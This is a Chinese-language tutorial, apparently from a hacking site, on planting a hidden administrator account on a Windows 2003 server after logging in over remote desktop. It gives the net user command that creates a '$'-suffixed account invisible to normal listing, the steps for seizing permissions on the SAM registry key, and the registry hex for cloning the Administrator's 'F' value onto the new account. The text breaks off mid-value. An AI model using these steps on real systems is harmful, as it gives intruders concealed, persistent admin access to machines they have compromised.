windows 2003開啟隱藏賬號的方法

class="area"> Windows 2003開啟隱藏賬號 
當登陸進3389以後-- 
先建立 cnlnfjhh$ 用戶 
c:\>net user cnlnfjhh$ wrsky /add 
//後面加$ 是為了使在 控制台下用 net user 看不到. 
然後運行regedt32.exe(注意不是regedit.exe) 
先找到HKEY_LOCAL_MAICHINE\SAM\SAM 點擊它 ,然後在菜單"安全"->"權限" 添加自己現在登錄的帳戶或組, 
把"權限"->"完全控制"->"允許"打上勾,然後確定. 
這樣就可以直接讀取本地sam的信息 
現在運行regedit.exe 
打開鍵 HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\cnlnfjhh$ 
查看默認鍵值為"0x3f1" 相應導出如下 
HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\cnlnfjhh$ 為cnlnfjhh$.reg 
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1 為 3f1.reg 
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 為 lf4.reg (Administrators的相應鍵) 
用記事本打開lf4.reg 找到如下的"F"的值,比如這個例子中如下 
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 
00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\ 
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\ 
00,00,00,00,00,00,00 
把其復制後,打開3f1.reg,找到"F"的值,將其刪除,然後把上面的那段粘貼. 
打開aspnet$.reg,把裡面的內容,比如這個例子中如下面這段復制 
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\cnlnfjhh$] 
@=hex(3f1): 
回到3f1.reg 粘貼上面這段到文件最後,最後生成的文件內容如下 
Windows Registry Editor Version 5.00 
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1] 
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 
00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\ 
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\ 
00,00,00,00,00,00,00 
"V"=hex:00,00,00,00,d4,00,00,00,02,00,01,00,d4,00,00,00,1a,00,00,00,00,00,00,\ 
00,f0,00,00,00,10,00,00,00,00,00,00,00,00,01,00,00,12,00,00,00,00,00,00,00,\ 
14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,\ 
01,00,00,00,00,00,00,00,00,00,00,14,01,0